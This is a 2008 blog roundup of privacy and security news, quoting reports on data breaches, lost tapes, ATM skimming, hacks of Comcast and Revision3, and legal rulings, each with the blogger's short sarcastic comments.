Saturday, May 31, 2008

It seems to me that taking weeks to determine what data was on your tapes just keeps your name in the news – and not in a good way.,0,4423158.story?track=rss

25 Firms With Data On Lost Tape Identified

By JANICE PODSADA | Courant Staff Writer May 31, 2008

The missing Bank of New York Mellon computer tape reported last week contained information about nearly 500,000 Connecticut residents from a large number of companies, said state officials, who identified 25 of the companies on Friday. [25, but not all? Bob]

... Some Connecticut residents, including Bruce Sylvester of Hamden, say they are having trouble obtaining information from New York Mellon as to whether their personal information is included on the missing tape.

"My wife and I have the same account," Sylvester said Friday. "We called up Mellon the same day and got two different answers as to whether our information was on the tape." [One assumes this would be handled by the bank's customer service department – would you expect anything else? Note that this leaves nothing in writing... Bob]

This week, New York Mellon also revealed a second security breach in which a computer data storage tape containing the images of scanned checks and other documents was lost in late April as it was being transported from Philadelphia to Pittsburgh.

"We are only now getting our arms around this much smaller incident," Bank of New York Mellon spokesman Ron Sommer said Friday. "I don't know if it involves Connecticut residents."

The second breach affects 47 institutional clients, company officials said. [If my math students told me 47 was smaller than 25, I'd flunk them. Bob]

You don't have to steal the data. Let someone else steal it, and you can just harvest their work.

Stolen data ending up in Google cache, say researchers

Saturday, May 31 2008 @ 07:37 AM EDT Contributed by: PrivacyNews News Section: Breaches

The Finjan security researchers, who uncovered several unprotected hacker servers containing the sensitive email and Web-based data of thousands of people, demonstrated how easy it is to find the data using Google.

By using a simple string of search terms the researchers were able to find stolen passwords and usernames, Social Security numbers, and even the usernames and passwords of internal databases of companies all stored in Google's public caching server.

Source - Props, Fergie's Tech Blog

Identity theft is simple enough for even dumb criminals, but what happens when you run out of patience?

4 Arrested In ATM Skimming Thefts

POSTED: 12:26 pm MST May 30, 2008 UPDATED: 5:32 pm MST May 30, 2008

SCOTTSDALE, Ariz. -- Four people were arrested this week in connection with a string of thefts from ATMs in Scottsdale hotels.

Police said the four used a device inserted into the card readers of the ATMs to hack into the internal computers of the machines and cause them to dispense large amounts of cash. [New, if true. Bob]

The group stole an estimated $100,000 that way, police said.

Two of the men also stole an ATM [Faster than hacking, but requires actual manual labor – not a geek thing. Bob] from the business center of a Scottsdale Hilton, according to police. Investigators said surveillance cameras caught Onik Darmandzhyan and Michael DeMatteo, both 32, stealing the machine.

“Youse can tell when youse got serious research, 'cause most of da page is footnotes.”

A look into the dark underbelly of data breaches

Friday, May 30 2008 @ 02:38 PM EDT Contributed by: PrivacyNews News Section: Breaches

The process by which large volumes of data are stolen, resold, and ultimately used by criminals to commit fraud, has evolved from the sale of a few pieces of sensitive information, such as credit card numbers and expiration dates, to full blown identity packages containing multiple types of sensitive personal information.

That is but one of the disconcerting details of a Department of Justice-penned report that looks at the rapidly morphing, dark side of stolen personal information set to appear in next month’s issue of the Santa Clara Computer and High Technology Journal.

Source - NetworkWorld

Related - DOJ Report: Data Breaches: What the Underground World of “Carding” Reveals [pdf]

I've mentioned that it is never wise to anger a hacker. It also make no sense for a security manager (or anyone concerned with security) to ignore a warning.

Comcast Hijackers Say They Warned the Company First

By Kevin Poulsen EmailMay 29, 2008 | 7:44:07 PM

The computer attackers who took down Comcast's homepage and webmail service for more than five hours Thursday say they didn't know what they were getting themselves into.

... Comcast, they said, noticed the administrative transfer and wrested back control, forcing the hackers to repeat the exploit to regain ownership of the domain. Then, they say, they contacted Comcast's original technical contact at his home number to tell him what they'd done.

When the Comcast manager scoffed at their claim and hung up on them, 18-year-old EBK decided to take the more drastic measure of redirecting the site's traffic to servers under their control. (Comcast would neither confirm nor deny the warning phone call.)

Note that Comcast is always making news. Must make the Board of Directors happy...

Comcast is Hiring an Internet Snoop for the Feds

Friday, May 30 2008 @ 02:43 PM EDTContributed by: PrivacyNews News Section: Businesses & Privacy

Wanna tap e-mail, voice, and Web traffic for the government? Well, here's your chance. Comcast, the country's second-largest Internet provider, is looking for an engineer to handle "reconnaissance" and "analysis" of "subscriber intelligence" for the company's "National Security Operations."

Source - Wired

Sounds impressive, but actually not such a much.

Lawsuit Makes Free Credit Monitoring Available

Saturday, May 31 2008 @ 07:02 AM EDT Contributed by: PrivacyNews News Section: Businesses & Privacy

If you have used a credit card or carried any kind of debt or loan account in the past 21 years it's very likely you can take part in an unprecidented $10-billion dollar lawsuit settlement.

Credit reporting agency TransUnion must pay back Aldin Cubillas and 160 million American consumers for selling their private credit information.

Anyone with credit information held by Transunion can retrieve their credit score which normally costs about $12. And on top of that they can enjoy 6 months of credit monitoring -- a $60 dollar value -- for free.

It's punishment for selling consumer credit information to marketers who then turned around and used that data to sell products and services right back to you.

Source - CBS

BlackBerry should milk this for all the advertising they can get.

RIM In Trouble For Not Violating Privacy

Posted by kdawson on Friday May 30, @12:29PM from the end-to-end-baby dept. Privacy

sufijazz writes

"The US government is not alone in wanting to snoop on everything citizens do over email/phone. The Indian government wants that right too. RIM is stating they have no means to decrypt, no master key, and no back door to allow the government to access email."

The article notes that 114,000 BlackBerries are in use on the Indian subcontinent. The government is concerned about attacks by militants and sees the BlackBerry as a security risk.

[From the article:

Two sources familiar with the issue said RIM held talks with the government on Thursday, and members of the Canadian High Commission in New Delhi were also seen at the telecoms ministry headquarters. [BlackBerry is a Canadian company Bob]

... "The BlackBerry security architecture was also purposefully designed to perform as a global system independent of geography," the company said in a letter.

"The location of data centers and the customer's choice of wireless network are irrelevant factors from a security perspective since end-to-end encryption is utilized."

Passwords are probably the wrong technology to use in systems that operate (no pun intended) on an 'ad hoc' basis.

Password sharing leaves NHS audit trail in tatters

Friday, May 30 2008 @ 02:25 PM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

Investigators have been unable to trace a doctor involved a medical blunder that ended in a patient's death because staff in a Devon hospital had been sharing computer passwords.

The case shows the incompatibility between the way doctors work in practice and the high security needed to protect large databases of confidential patient information under the £12.7bn National Programme for IT (NPfIT).

Source -

How things work in the big leagues. For my Business Continuity class...

A Look At the Workings of Google's Data Centers

Posted by Soulskill on Saturday May 31, @08:07AM from the we're-gonna-need-a-bigger-boat dept.

Doofus brings us a CNet story about a discussion from Google's Jeff Dean spotlighting some of the inner workings of the search giant's massive data centers. Quoting:

"'Our view is it's better to have twice as much hardware that's not as reliable than half as much that's more reliable,' Dean said. ' You have to provide reliability on a software level. If you're running 10,000 machines, something is going to die every day.' Bringing a new cluster online shows just how fallible hardware is, Dean said. In each cluster's first year, it's typical that 1,000 individual machine failures will occur; thousands of hard drive failures will occur; one power distribution unit will fail, bringing down 500 to 1,000 machines for about 6 hours; 20 racks will fail, each time causing 40 to 80 machines to vanish from the network; 5 racks will "go wonky," with half their network packets missing in action; and the cluster will have to be rewired once, affecting 5 percent of the machines at any given moment over a 2-day span, Dean said. And there's about a 50 percent chance that the cluster will overheat, taking down most of the servers in less than 5 minutes and taking 1 to 2 days to recover."

[From the article:

To operate on Google's scale requires the company to treat each machine as expendable.

Beware the iPhone 2.0

The iPhone patent: Steven P. Jobs, inventor — The US Patent and Trademark Office has revealed a mammoth document that can only be described as The iPhone Patent, a 371-page spectacular that covers Apple's handheld multi-touch UI paradigm in excruciating detail. Steve himself wasn't the least bit shy about taking credit atop an entire column of company A-listers for inventing the iPhone's ...

[From the article:

The application also mentions "modules" for video conferencing, GPS, and other currently non-existent (though widely expected) functionality.

Gartner is a well respected group with contacts in most IT shops across the country. Worth looking at their list

Gartner Reveals Top 10 Technologies For Next Four Years

Posted by ScuttleMonkey on Friday May 30, @03:30PM from the guessing-game dept. IT Technology

Dr. Jim writes

"The good folks over at the Gartner Group have revealed the top 10 technologies that they believe will change the world over the next four years. The usual suspects including multi-core chips, virtualization, and cloud computing are on the list. Multicore servers and virtualization will mean that firms will need fewer boxes, and apps can be easily moved from box to box (and right out the door to an outsourced data center). Workplace social networks and cloud computing means that the need for a centralized IT department will go away. Firms will no longer need to own/maintain the boxes that they use to run their firm's apps. With no need to touch a box, there will be no need to have the IT staff co-located with the boxes."

I like lists and I'm cheap. This list feeds both of my addictions.

Free Open Source Counterparts of Windows Software

May. 28th, 2008 by Varun Kashyap

... But wait I am not finished yet, keep visiting often and check back because soon we will be replacing the complete Adobe Creative Suite with open source software!

Friday, May 30, 2008

Is nothing sacred?

KY: Stolen traffic records include personal information

Thursday, May 29 2008 @ 04:55 PM EDT Contributed by: PrivacyNews News Section: Breaches

The records of more than 300 traffic cases were stolen this month from the Jefferson County court archives, leading court officials to update their security and warn citizens of potential identify theft.

The traffic cases, all from November 2003, include the names, addresses, dates of birth and possibly the Social Security number of people who received a traffic citation or were involved in DUI arrest that month, said Jefferson Circuit Court Clerk David Nicholson.

He said court workers did not know the records were missing until police told them yesterday.

Source -

Do you really want to say: “We don't know what we're doing?”

State Street Data Theft Affects More Than 45,000

Thursday, May 29 2008 @ 03:38 PM EDT Contributed by: PrivacyNews News Section: Breaches

Computer equipment containing personal information on more than 45,000 customers and employees of a State Street unit was stolen five months ago, the company said. The personal information included names, addresses and social security numbers.

... The company, a Boston-based provider of financial services to institutional investors, said 5,500 employees and 40,000 customers of Investors Financial Services, which it acquired last year, were affected.

The computer equipment was stolen from a vendor hired by Investors Financial Services to provide legal support services.

... The theft occurred in December. State Street said it was informed of the theft in January and needed the past four months to analyze what and whose information had been stolen. That analysis was completed Wednesday.

Source - CNBC

Related - AP reports that State State says it will provide those affected with free credit monitoring for two years.

Perhaps we can get a look inside if we follow this one.

Stolen Verizon Wireless customer data part of racketeering and money laundering case

Thursday, May 29 2008 @ 12:05 PM EDT Contributed by: PrivacyNews News Section: Breaches

As a follow-up to a story posted on April 25 concerning the discovery of Verizon Wireless customer data in possession of a former employee, Somerset County Prosecutor Wayne J. Forrest announced earlier today that the Somerset County Grand Jury has returned a 407 Count Indictment charging fifteen defendants in an interstate Racketeering, Money Laundering and Conspiracy case. In a press release, Forrest stated, "The underlying investigation, code-named “Operation Stop Payment”, focused primarily on: identifying the number of defendants involved in this criminal enterprise; identifying any individuals, financial institutions or other business and government entities that were victimized by this criminal enterprise; and stopping the payment on fictitious payroll checks that were manufactured by this criminal enterprise on an almost daily basis."

During the execution of search warrants as part of their investigation, detectives had discovered customer records belonging to 2,700 Verizon Wireless customers. The customer data included personal identification information such as the customer’s name, address, cellular account information, Social Security number and/or Federal Taxpayer Identification Number. Prosecutor Forrest said the grand jury charged Tihee Jabbar Brisbane with multiple counts of second degree computer related criminal activity stemming from the theft of the Verizon Wireless customer account summaries. Brisbane had previously been employed as a telemarketing representative for Verizon Wireless from November 3, 2003, until January 26, 2005 at the Verizon Wireless offices located in Branchburg, Somerset County.

The press release provides more details about the other defendants and allegations as well as a listing of banks and companies that were victimized.

Not sure how this could occur every time one user tried to logon yet be classes as “isolated.”

"Glitch" gives customer access to other Charter accounts

Friday, May 30 2008 @ 06:19 AM EDT
Contributed by: PrivacyNews
News Section: Breaches

.... McDowell was horrified that she had somehow gotten into a stranger's account. She quickly logged off. Besides, she still had her own bill to pay.

. She tried again to log on to her account. This time she arrived at the Charter account of a woman in Slidell, La.

. McDowell logged off and tried again, this time arriving at the Charter account of a woman in Covington, Ga.

.McDowell says she did this 20 times, each time getting the account of a different Charter customer. She couldn't see any connection between the names or addresses, although she did note that many of the accounts listed overdue bills.

... Lamont said the company fixed the "glitch" later in the day.

... Lamont said Charter recently had started a new service activation system. In a few isolated instances, "The customer login information was erroneously 'matched' to the wrong customer account under certain specific circumstances upon login attempt. And I hope you'll understand that that's all we can really say," she said in an e-mail. [“Without convincing you that we are entirely incompetent.” Bob]

Source -

This is an interesting description of a Denial of Service attack. The perpetrators willingly admitted that they caused the attack, and even claimed it was because they wanted to continue using Revision3's servers! Sounds like an open and shut lawsuit to me...

Inside the Attack that Crippled Revision3

on May 29th, 2008 at 07:49 am by Jim Louderback in Polemics

As many of you know, Revision3’s servers were brought down over the Memorial Day weekend by a denial of service attack. It’s an all too common occurrence these days. But this one wasn’t your normal cybercrime – there’s a chilling twist at the end. Here’s what happened, and why we’re even more concerned today, after it’s over, than we were on Saturday when it started.

Tools & Techniques: Might be very useful for my website class, not to mention the security troops...

May 30, 2008 12:01 AM PDT

Firefox add-on shows all the files downloaded by the current page

Posted by Dennis O'Reilly Post a comment

These days you can't be too careful about what you download. A new Firefox add-on from Florian Queze called View Dependencies takes some of the guesswork out of knowing the content of a Web page, and the source of that content.

After you download the free add-on and restart Firefox, you'll see a Dependencies tab when you click Tools > Page Info to view information about the page that's currently open. The tab lists the files on the page, their URL, and their size.

... You can right-click an entry and choose Open in New Tab or Open in New Window to view just that one file. Other context-menu options let you copy the entry, copy just the URL, or just the host name. [Great for stealing... I mean, reverse engineering, and duplicating without compromising patents or copyrights. Bob]

Registration required – probably worth it.

Akamai Releases State of the Internet Report

Written by Allen Stern - May 29, 2008

Akamai is out today with their first "State of the Internet" report. The report is well worth a read as it covers a variety of topics including: security, connection speeds, geography, network access, and Internet penetration. Some of the interesting stats include:

  • China leads the world in attack traffic including denial of service attacks.

  • Nearly 30% of attacks are to port 135 which is used for remote procedure calls on Microsoft operating systems.

  • In March 2008, more than 10,000 Web pages on hundreds of Web sites were infected by hackers looking to steal passwords used in popular online games.

Some details seem a bit fantastic, but if true, they are tools I want!

May 29, 2008 6:02 PM PDT

Did Chinese officials copy U.S. government laptop data and use it in hack?

Posted by Elinor Mills 10 comments

The U.S. government is looking into allegations that Chinese officials snagged a laptop left unattended by a top U.S. official there, copied the data and then used it to try to hack into U.S. government computers, according to a report by The Associated Press.

The incident is alleged to have happened during Commerce Secretary Carlos M. Gutierrez's trip to Beijing in December, unidentified sources told the AP. Gutierrez told the wire service he couldn't comment on an ongoing investigation.

Since then, the U.S. Computer Emergency Readiness Team, known as US-CERT, responded to computer network break-ins at least three times, the report says.

"The Pentagon, State Department and Commerce Department all have been victimized by widespread computer intrusions blamed on China since July 2006," with the Commerce Department even having to unplug itself from the Internet, as a result, the article says.

[From the article:

Surreptitious copying is believed to have occurred when a laptop was left unattended during Gutierrez's trip to Beijing for trade talks in December...

... Modern copying equipment can duplicate a laptop's storage drive in just minutes. [Not that I'm aware of... Bob]

... A senior U.S. intelligence official, Joel F. Brenner, recounted a separate story of an American financial executive who traveled to Beijing on business and said he had detected attempts to remotely implant monitoring software on his handheld "personal digital assistant" device - software that could have infected the executive's corporate network when he returned home. The executive "counted five beacons popped into his PDA between the time he got off his plane in Beijing and the time he got to his hotel room," Brenner, chief of the office of the National Counterintelligence Executive under the CIA, said during a speech in December.

Brenner recommended throwaway cellular phones for any business people traveling to China.

"The more serious danger is that your device will be corrupted with malicious software that takes only a second or two to download - and you will not know it - and that can be transferred to your home server when you collect your e-mail," he said.

Never annoy a hacker. Never, never annoy lots of hackers.

Comcast Hacked in BitTorrent Throttling Payback?

Written by enigmax on May 29, 2008

It has become apparent during the last few hours that Comcast, everyone’s favorite ISP (especially in the BitTorrent world) has been hacked. The message on the homepage read: “KRYOGENIKS EBK and DEFIANT RoXed COMCAST.”

Can you “disappear” on the Internet?

How to be unGoogleable

Thursday, May 29 2008 @ 10:20 AM EDT Contributed by: PrivacyNews News Section: Internet & Computers

I recently received an odd plea for help. A former colleague e-mailed me to request that all references to her be expunged from the online news blog I coordinate for a university here in Rome. It was a legitimate request, I concluded, so I went into the old posts and deleted the one in which her name appeared. It was about an upcoming event on campus from more than a year ago and had absolutely no news value to readers today.

She was grateful for my quick response. A few minutes later though she was back in my in-box. This time, the tone was less gracious. She Googled her name and still the reference appeared.

Source - Times Online

Thanks to Brian Honan for this link.

Standards is standards. Someone has to try to establish good (if not best) practices...

CDT Issues Privacy Principles for Digital Watermarking

Friday, May 30 2008 @ 06:11 AM EDT Contributed by: PrivacyNews News Section: Other Privacy News

CDT today released a paper offering a set of principles for addressing potential privacy considerations when deploying digital watermarking technology. This technology embeds information within the content of digital media files in a form that is machine readable but often imperceptible to humans. Digital watermarking has a variety of applications and is increasingly being considered as a tool for deterring copyright infringement. CDT's paper is intended to provide guidance for companies that plan to use the technology to communicate information that is specific to individual consumers.

Source - CDT Press Release Related - Privacy Principles for Digital Watermarking [PDF]

Thursday, May 29, 2008

Big data theft and more evidence that I am not fluent in English...

In: City BPO accused of data theft

Thursday, May 29 2008 @ 06:20 AM EDT Contributed by: PrivacyNews News Section: Breaches

It could well be one of the biggest data thefts in the country. An Ahmedabad-based BPO owner, Maulik Dave, has been accused of data theft from a Florida-based company and selling them to its rival companies in the US.

Dave stole data worth Rs 1 crore [10,000,000? Bob]from the company. With the help of his accomplice based in the US, Milan Dabhi, he sold the data to competitors of the company in the US.

The nondescript office of Business Bee Solutions along the SG Road, a BPO working in the IT sector, has been closed for three months soon after Florida-based Company Noble Ventures Inc. cancelled their contract with Dave.

He then shifted his operations to his home in Vejalpur. Dave had got a contract for two years for designing and maintenance of the website of Noble Ventures Inc. This company provides customer database of 1.25 crore [12.500,000? Bob] US citizens to various marketing companies in the US and also has a client-base in other international markets.

When his contract got cancelled, Dave tapped into the data bank of Noble Ventures Inc., and stole 85 lakh [8,500,000? Bob] records and sold it to the company's rivals in the US.

Source - The Times of India

How things go wrong?

AU: Privacy Commissioner publishes case notes 1 - 7 for 2008

Thursday, May 29 2008 @ 06:05 AM EDT Contributed by: PrivacyNews News Section: Non-U.S. News

The Privacy Commissioner, Karen Curtis, has today released seven new case notes:

The Privacy Commissioner publishes case notes of finalised complaints that are considered to be of interest to the general public.

Cases chosen involve interpretation of the Privacy Act or associated legislation in new circumstances, illustrate systemic issues or illustrate the application of the law to a particular industry or subject area. The case notes are intended to offer a synopsis only and not to be a comprehensive account.

It is a function of the Commissioner to endeavour to resolve complaints by conciliation where appropriate. As a result, the outcome in any particular case will be affected by a number of factors, including the applicable law, the facts of the matter and the approach to the conciliation process taken by both the complainant and respondent.

Please visit the Complaint Case Notes, Summaries and Determinations page for more details.

Source - Office of the Privacy Commissioner

How do you know that credit card information you stole/bought is any good?

Credit thieves use campaign Web sites to test stolen cards’ validity

Thursday, May 29 2008 @ 06:35 AM EDT Contributed by: PrivacyNews News Section: Breaches

Charles Bridges isn't a supporter of Barack Obama.

So he was surprised to find a $103.90 donation to the Obama For America campaign on his American Express credit card statement last month.

What I found out from talking to folks at the Obama campaign was that there is a growing criminal enterprise in which stolen credit card numbers are used to make online donations to political campaigns and charities.

It's not that crooks are suddenly becoming activists or do-gooders. Instead, they have found that making online donations is an easy way to verify that the stolen credit card numbers they are buying or selling are valid.

Source - how do you tell a crook from a broker?

Stealing From Banks One Cent at a Time

Posted by CmdrTaco on Wednesday May 28, @11:42AM from the not-like-atm-fees-steal-from-you dept. The Almighty Buck Security

JRHelgeson writes

"In a story strangely reminiscent of Superman 3, a 'hacker' allegedly stole over $50,000 from PayPal, Google Checkout as well as several unnamed online brokerage firms. When opening an online brokering account it is common practice for companies such as E-trade and Schwab to send a tiny payment — ranging from only a few cents to a couple of dollars — to verify that the user has access to the bank account listed. According to the story, the attacker wrote a script that opened thousands of accounts at dozens of these providers. He was arrested not for taking the money, but for using false names in order to get it."

Perhaps we should include mandatory encryption language in our laws?

M&S appeals against data protection ruling

Wednesday, May 28 2008 @ 08:27 PM EDT Contributed by: PrivacyNews News Section: Breaches

Marks and Spencer (M&S) is appealing against a ruling by the Information Commissioner’s Office (ICO) that the company breached the Data Protection Act (DPA), Computing has learned.

The case will set a precedent on whether or not companies need to encrypt laptops to comply with the DPA.

In January this year, the ICO issued an enforcement notice to the firm to encrypt its laptop hard drives, following the theft from a sub-contractor in April 2006 of a computer containing details of the pension arrangements of 26,000 M&S staff.

Source - computing

What (you ask) is the opposite of “Security through Obscurity?” No stunning examples in the comments, yet.

What Examples of Security Theater Have You Encountered?

Posted by timothy on Wednesday May 28, @04:47PM from the kip-hawley-please-to-the-white-courtesy-phone dept. Security

swillden writes

"Everyone who pays any attention at all to security, both computer security and 'meatspace' security, has heard the phrase Security Theater. For years I've paid close attention to security setups that I come in contact with, and tried to evaluate their real effectiveness vs their theatrical aspects. In the process I've found many examples of pure theater, but even more cases where the security was really a cover for another motive." swillden would like to know what you've encountered along these lines; read on for the rest of his question below.

swillden continues: "Recently, a neighbor uncovered a good example. He and his wife attended a local semi-pro baseball game where security guards were checking all bags for weapons. Since his wife carries a small pistol in her purse, they were concerned that there would be a problem. They decided to try anyway, and see if her concealed weapon permit satisfied the policy. The guard looked at her gun, said nothing and passed them in, then stopped the man behind them because he had beer and snacks in his bag. Park rules prohibit outside food. It's clear what the 'security' check was really about: improving park food vending revenues.

So, what examples of pure security theater have you noticed? Even more interesting, what examples of security-as-excuse have you seen?"

Wednesday, May 28, 2008

Do you suppose these questions would ever be asked at a stockholders meeting?

Axcess Financial laptop stolen in October, but customers not notified until May

Tuesday, May 27 2008 @ 09:15 AM EDT Contributed by: PrivacyNews News Section: Breaches

With many angry voices demanding to know why Bank of New York Mellon customers were not notified of a security breach months ago, some of the smaller breaches that do not get disclosed promptly often get overlooked. One such case involved a laptop stolen form Axcess Financial, Inc. On May 13, Axcess Financial, Inc. notified the New Hampshire Attorney General's office that a laptop stolen from an employee on October 23, 2007 contained personal information including names, addresses, and Social Security numbers of 142 residents of NH who were customers of the company. No explanation was provided to either the AG's office or customers as to why notification to customers was delayed for over 6 months other than that "an extensive forensic investigation was required to determine the information contained within the stolen property." In its notification and disclosure letters, Axcess Financial indicated that misuse of the data was unlikely because of the laptop's "password protection and other security measures." Customers were offered free credit monitoring for 12 months.

When asked for more details about the incident and delayed notification, Jeff Kursman, Director of Public Relations for Axcess Financial, informed that the laptop had been stolen from an employee's vehicle and that the employee was following policy at the time. Kursman did not reply directly to the question of whether the data were encrypted, saying only that "The laptop was secured with password protection."

Did it really take Axcess Financial six months to determine what information was on that laptop? Kursman explains, "The incident was initially classified by law enforcement as a petty crime involving an employee's stolen personal belongings. When it was ascertained that the theft included the loss of a secured computer, additional forensic analysis was conducted. Axcess Financial was supporting an active investigation of law enforcement to recover the property and identify and prosecute the thief(s)." A follow-up inquiry to Kursman asking whether law enforcement specifically requested that Axcess Financial delay notification or if Axcess Financial delayed it on its own initiative was not answered by the time of publication.

Expect more of this at gas stations. After all, if you have enough money to buy gas, your identity is worth stealing!

San Jose police investigating another string of ID thefts at an Arco gas station

Wednesday, May 28 2008 @ 06:51 AM EDT Contributed by: PrivacyNews News Section: Breaches

More than a dozen Silicon Valley consumers have been victimized by thieves who allegedly stole their bank card information and personal identification numbers at a South San Jose gas station.

San Jose police were notified of a theft Monday night when a San Jose couple reported three unauthorized withdrawals totaling $1,500 from their bank account over Memorial Day weekend. By late afternoon, police had reports of at least seven confirmed victims who lost a combined $4,200. They all were customers recently at the same Arco station in the Almaden Valley.

Source - Mercury News Related - NBC11

“Hope is not a strategy” Title of a book I once read (I can too read!)

Business owners have false hopes when it comes to data loss

Wednesday, May 28 2008 @ 06:54 AM EDT Contributed by: PrivacyNews News Section: Breaches

A recent study of fifteen hundred business owners shows that most have an “air of invincibility” when it comes to the potential for their company to suffer an intentional or accidental data exposure. This could explain why we have seen record numbers of information stolen, lost, or leaked over the past year or so.

It is understandable that some companies feel they are secure. However, when the topic of data breaches ranked last among the biggest business fears behind government fines, lawsuits, bankruptcy, and natural disasters, there is something wrong. Forty-five percent of those interviewed admit they are more concerned about data breaches than in the past, however that figure pales in comparison to the fact that thirty percent are more concerned that they could personally become a victim of identity theft (76% vs. 45%).

Source - The Tech Herald

What will happen when the number of reports exceeds the number of soccer games?

UK: Companies told to disclose data breaches

Wednesday, May 28 2008 @ 06:45 AM EDT Contributed by: PrivacyNews News Section: Breaches

The EU's online security body is calling for laws to force companies to reveal when their computer systems have been breached.

The European Network and Information Security Agency (Enisa) wants mandatory reporting on security and data breaches by businesses.

Enisa called for the change in its General Report 2007, where it also detailed the spread of Computer Emergency Response Teams (Certs) to 14 EU states, up from eight in 2005.

Source - ZDNet (UK)

Related - ENISA: General Report 2007: Full Report (Adopted but financial/accounting figures are provisional. Final, designed version scheduled for July 2008.) [pdf]

Probably the same ratio in the US...

UK: Identity fraud cases up by two thirds

Tuesday, May 27 2008 @ 05:31 PM EDT Contributed by: PrivacyNews News Section: Breaches

Cases of identity fraud increased by two thirds last year with people in affluent areas most at risk, credit data figures show.

London was Britain's identity fraud capital with people almost twice as likely to become victims as those in the rest of the country.

Kensington was the most vulnerable area with residents facing a risk more than three-and-a-half times the average.

It was followed in the top five by Richmond-upon-Thames, Putney, Wimbledon and the King's Road area of Chelsea. Commuter towns, including Guildford, St Albans and Windsor, also faced a risk that was twice the national average.

Source - Telegraph

...and a lot of people use Adobe Flash...

Adobe Flash Zero-Day Attack Underway

Posted by kdawson on Wednesday May 28, @03:26AM from the gone-in-a-flash dept. Security

Robellus writes

"Security researchers have found evidence of a previously unknown Adobe Flash vulnerability being exploited in the wild. The zero-day flaw has been added to the Chinese version of the MPack exploit kit and there are signs that the exploits are being injected into third-party sites to redirect targets to malware-laden servers. From the article: 'Continued investigation reveals this issue is fairly widespread. Malicious code is being injected into other third-party domains (approximately 20,000 web pages) most likely through SQL-injection attacks. The code then redirects users to sites hosting malicious Flash files exploiting this issue.'"

Another Chinese innovation? (Isn't this likely to slow entrance to the stadium while ticket holders are matched to their photograph and the 'approved' list?

Olympic Tickets Contain Microchip With Your Data

Posted by kdawson on Tuesday May 27, @11:11PM from the what-has-identity-to-do-with-intent dept. Privacy

OMNIpotusCOM writes

"Tickets to the Olympic opening and closing ceremonies will contain a microchip with information about the ticket holder, including a photograph, passport details, addresses, e-mail, and telephone numbers. The stated intent is to keep troublemakers out of the 91,000-seat National Statdium so that they cannot cause disruptions while China is on world-wide television, but it brings up serious concerns for privacy and identity theft."

The world, she is a changing...

In London, a Glimpse of a Broadband Future

Om Malik, Monday, May 26, 2008 at 7:06 PM PT

London is one of those few fortunate cities to have a surfeit of telecom competition. From broadband providers to mobile operators, Londoners have a choice. They have decent broadband speeds as well as access to Wi-Fi and 3G networks. And as a result, there has been a big change in their behavior.

A new report from Ofcom outlines how Londoners (and the rest of the UK) are using these new wireless and broadband services. It’s a great example of how consumer behavior changes with bandwidth.

Another blow to Microsoft?

May 27, 2008

A Strategy for Openness: Enhancing E-Records Access in New York State

Government Technology: "The New York State Office for Technology and the New York State Archives, a program of the State Education Department, issued a report last week that examines how the state can provide choice, interoperability and vendor neutrality in electronic document creation while ensuring electronic records are preserved and remain accessible. A Strategy for Openness: Enhancing E-Records Access in New York State makes recommendations to promote openness and transparency aimed at ensuring public records remain free from being locked into proprietary systems and software applications."

Big happenings in law...

May 27, 10:41 AM EDT

Justices turn down T-Mobile appeal over contracts


WASHINGTON (AP) -- The Supreme Court handed a defeat to T-Mobile USA Inc. Tuesday, rejecting the company's appeal in three cases involving the legal remedies available in millions of cell phone contracts.

The issue in the three cases is the same: whether state laws that limit the ability of companies to prohibit consumers from banding together to pursue class action lawsuits are preempted by federal law.


Internet-Based Realtors Win Monster Settlement

Posted by kdawson on Tuesday May 27, @07:20PM from the disintermediation-works-eventually dept. The Courts United States

coondoggie writes

"Until today, most Internet-based real-estate brokers were considered second-class citizens, and their clients were left in the cold. But perhaps that will change with today's news that the Department of Justice has reached a proposed settlement with the National Association of Realtors that requires NAR to let Internet-based residential real estate brokers compete with traditional brokers. NAR has agreed to be bound by a 10-year settlement, under whose terms NAR will repeal its anticompetitive policies and require affiliated multiple listing services to repeal their rules that were based on these policies."

Here's the whole settlement document on the DoJ's site.

Tsk Tsk

Court finds Dell guilty of fraud

N.Y. court finds that Dell deprived customers of technical support they bought or were eligible for under warranty

By Nancy Gohring, IDG News Service May 28, 2008

Dell was found guilty on Tuesday of fraud, false advertising, deceptive business practices, and abusive debt collection practices in a case brought by the New York attorney general.

The Albany County Supreme Court found that Dell deprived customers of technical support that they bought or were eligible for under warranty in several ways, including by requiring people to wait for very long times on the phone, repeatedly transferring their calls and frequently disconnecting their calls.

Dell also often failed to provide onsite repairs for customers who bought contracts for such support and often blamed software when hardware was actually the problem, the court found. The company also sometimes refused to offer support when a support contract ended, even though the user had first complained about a problem before the end of the contract. Subscribers to a "next-day" repair service sometimes waited as long as a year for support, the court found.

Developing hackers in the developing world/

OLPC's XO As a Wireless Hacking Tool

Posted by timothy on Tuesday May 27, @10:11AM from the well-equipped dept. Security Education Wireless Networking IT

twistedmoney99 writes

" has a whimsical yet intriguing look at the OLPC in an article series titled "One Leet Pwning Child — Give one, Get Owned". Part one details how to upgrade the core system with some extras, but part two is where the fun begins as the author converts the OLPC into a lean green hacking machine to enable wireless sniffing, setup the OLPC for vulnerability assessments, and stage the device for a little autopwning with Metasploit."

I want a grant to study the effects of beer on Global Warming - Grant Funding Search

Grant Gopher is a site that sends registered users weekly email announcements about available grants. Users can find out about federal, state, private, and local grant donations to open up funding possibilities for their causes. Possible grant receivers can be individuals, small businesses, and larger organizations. To find a grant that suits their cause, users may search the list of available grants, and refine their search with criteria that is relevant to their needs and qualities. This is free site to use, and also offers links on other free resources that users will find valuable, such as a grant glossary and a list of various grant forms.

I'm seeing many sites like this one. Perhaps enough to allow my students to work as teams, even though they are often not even in the same country... - Free Online Meetings and Screen Sharing

Mikogo allows anyone to implement presentations and online meetings for free. The screen sharing tool, once installed, allows up to ten users to connect and view content from one of the member’s computer screen. Mikogo allows access via remote control; presenters can easily be switched during a presentation; file sharing is enabled with privacy controls, and you can pause transmissions. Mikogo works with Skype as well, meaning you can share you screen and get free phone calls. It’s perfect for remote learning, webinars, remote support, product demos and online meetings. There’s a complete set of both audio and video tutorials for beginners.

Something for the little geeks.

Entertaining the Kids for Free - With Linux

By Katherine Noyes LinuxInsider Part of the ECT News Network 05/27/08 4:00 AM PT

Dilbert on the latest in computer security

Tuesday, May 27, 2008

Towards ubiquitous surveillance. Why didn't Google think of this?

Buses as Mobile Sensing Platforms?

Posted by ScuttleMonkey on Monday May 26, @07:06PM from the jealously-guarding-the-bus-lane dept. Transportation Wireless Networking

Roland Piquepaille writes

